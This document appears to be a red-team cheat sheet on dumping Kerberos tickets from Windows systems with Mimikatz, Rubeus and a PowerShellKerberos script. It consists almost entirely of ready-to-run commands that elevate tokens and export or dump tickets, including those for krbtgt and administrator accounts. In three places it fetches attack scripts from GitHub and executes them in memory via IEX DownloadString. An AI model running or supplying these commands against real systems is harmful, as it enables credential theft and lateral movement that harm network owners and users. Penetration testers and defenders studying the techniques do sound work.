Requirements
Unprivileged: can extract Kerberos tickets for the current user context
Privileged (Elevated): can extract all Kerberos tickets on the given system
Tools
Tool Usage
Mimikatz
# Export to file methods
# Export tickets (Preferred Method (More Accurate))
Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"
# Alternative Method
Mimikatz.exe "token::elevate" "kerberos::list /export"
# Export to Base64 without touching disk
Mimikatz.exe "token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"
# Load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1')
# Export to file methods
# Export tickets (Preferred Method (More Accurate))
Invoke-Mimikatz -Command '"token::elevate" "sekurlsa::tickets /export"'
# Alternative Method
Invoke-Mimikatz -Command '"token::elevate" "kerberos::list /export"'
# Export to Base64 without touching disk
Invoke-Mimikatz -Command '"token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"'
Rubeus
# Dump All
.\Rubeus.exe dump /nowrap
# Dump Specified tickets that match a service
.\Rubeus.exe dump /service:krbtgt /nowrap
.\Rubeus.exe dump /service:HTTP /nowrap
# Dump tickets for specified users
.\Rubeus.exe dump /user:administrator /nowrap
# Dump tickets that match both a service and a user
.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap
# Load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
# Dump All
Invoke-Rubeus -Command "dump /nowrap"
# Dump Specified tickets that match a service
Invoke-Rubeus -Command "dump /service:krbtgt /nowrap"
Invoke-Rubeus -Command "dump /service:HTTP /nowrap"
# Dump tickets for specified users
Invoke-Rubeus -Command "dump /user:administrator /nowrap"
# Dump tickets that match both a service and a user
Invoke-Rubeus -Command "dump /service:krbtgt /user:administrator /nowrap"
PowerShellKerberos
# Load into memory and dump
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')
Ticket Injection
WIP